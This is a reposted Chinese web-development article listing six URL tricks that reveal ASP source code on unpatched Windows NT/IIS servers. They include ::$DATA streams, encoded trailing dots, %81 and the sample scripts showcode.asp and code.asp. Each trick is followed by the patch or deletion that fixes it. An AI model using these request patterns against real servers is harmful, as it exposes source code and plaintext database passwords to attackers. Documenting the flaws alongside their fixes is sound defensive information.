当前位置：首页 > 站长学院 > 网络编程 > ASP

偷看ASP原码的6种方法

作者：佚名出处：网络转载时间：06-26 点击：

内容载入中...

在没有打Services Pack6补丁的NT server上，至少有6种方法可以看到ASP程序的源代码,它们是:

1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp
解决方案:删除showcode.asp

2、http://somewhere/something.asp::$DATA
解决方案: 装sp3

3、http://somewhere/something.asp%2e
解决方案: 装sp4

or http://somewhere/something.asp.(加一个点)
解决方案: 装sp4

4、http://somewhere/something%2e%41sp
或者 http://somewhere/something%2e%asp
解决方案: 装sp4

5、http://somewhere/something.asp%81
解决方案:装sp6或者打补丁

6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp

最大的危害莫过于asp文件可以被上述方式读出；数据库密码以明文形式暴露在黑客眼前.

收藏本文：

【大中小】【打印页面】【推荐给朋友】【关闭窗口】

<< 上一篇：ASP优化

>> 下一篇：Asp降龙十八掌

相关新闻

·一个简单聊天试的源代码！（三）
·ADSI 2.0、2.5 和 MDAC 2.1 的兼容问题
·写一个登陆用的用户控件
·WebEmail免费邮件发送组件！！
·用asp自动解析网页中的图片地址，并将其保
·用ASP存取各种常用类型数据库(四)
·EnableViewState属性
·使用 IIS 5.0 调整 Web服务器的艺术与科学

最新资讯

·ASP实例：词语搭配游戏的制作
·再说ASP输出N行N列表格
·ASP实例：动态网页中常用的6个ASP程序
·分享：XML HTTP Request的属性和方法简介
·ASP实例：利用缓存提高数据显示效率
·asp实例：测试WEB服务器
·ASP实例讲解：用分页符实现长文章分页显示
·ASP技巧实例：ASP实现最简洁的多重查询的解

站长学院

[ASP]
[PHP]
[JSP]
[CGI/perl]
[ASP.NET]
[C#]
[XML]
[编程综合]

推荐信息

本类热点

·ASP判断一个字符串包含在一个长字
·学习ASP前需要准备些什么呢
·用ASP批量更新SQL SERVER数据
·ASP漏洞分析和解决方法(10)
·WScript对象的VBS,VBScript
·ASP漏洞分析和解决方法(3)
·ASP漏洞分析和解决方法(1)
·ASP漏洞分析和解决方法(4)
·ASP漏洞分析和解决方法(2)
·ASP漏洞分析和解决方法(7)